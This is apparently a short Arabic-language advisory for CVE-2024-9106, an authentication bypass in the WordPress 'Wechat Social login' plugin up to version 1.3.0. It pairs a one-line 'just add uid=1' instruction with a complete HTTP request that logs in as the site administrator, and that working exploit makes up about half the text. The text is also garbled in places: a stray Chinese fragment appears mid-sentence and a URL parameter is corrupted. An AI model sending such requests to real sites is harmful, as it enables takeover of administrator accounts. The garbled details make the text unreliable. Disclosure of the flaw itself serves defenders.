
Wechat Social login <= 1.3.0 - تجاوز المصادقة
تسجيل الدخول عبر Wechat <= 1.3.0 - تجاوز المصادقة
إضافة تسجيل الدخول الاجتماعي عبر Wechat لووردبريس معرضة لتجاوز المصادقة في الإصدارات حتى 1.3.0 بما في ذلك. يرجع ذلك إلى التحقق غير الكافي من المستخدم المقدم أثناء تسجيل الدخول الاجتماعي.这使得 المهاجمين غير المصادقين قادرين على تسجيل الدخول كأي مستخدم موجود في الموقع، مثل المسؤول، إذا كان لديهم إمكانية الوصول إلى معرف المستخدم. يمكن استغلال هذا الأمر فقط إذا لم يتم تعيين سر التطبيق، حيث تكون قيمته فارغة افتراضيًا. ما عليك سوى إضافة uid=1 أو تغيير رقم المعرف إلى الحساب الذي تريد تسجيل الدخول إليه. يعمل فقط مع Wechat.
CVE: CVE-2024-9106
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wechat-social-login
GET /wp-admin/admin-ajax.php?channel_id=social_weibo&action=xh_social_channel&uid=1&tab=login_redirect_to_authorization_uri&xh_social_channel=8e7bec203c¬ice_str=1773207877&hash=4165e284f73b86c0c642973816d0cd17&redirect_to=http%3A%2F%2Fkubernetes.docker.internal%2Fwp-admin%2F HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive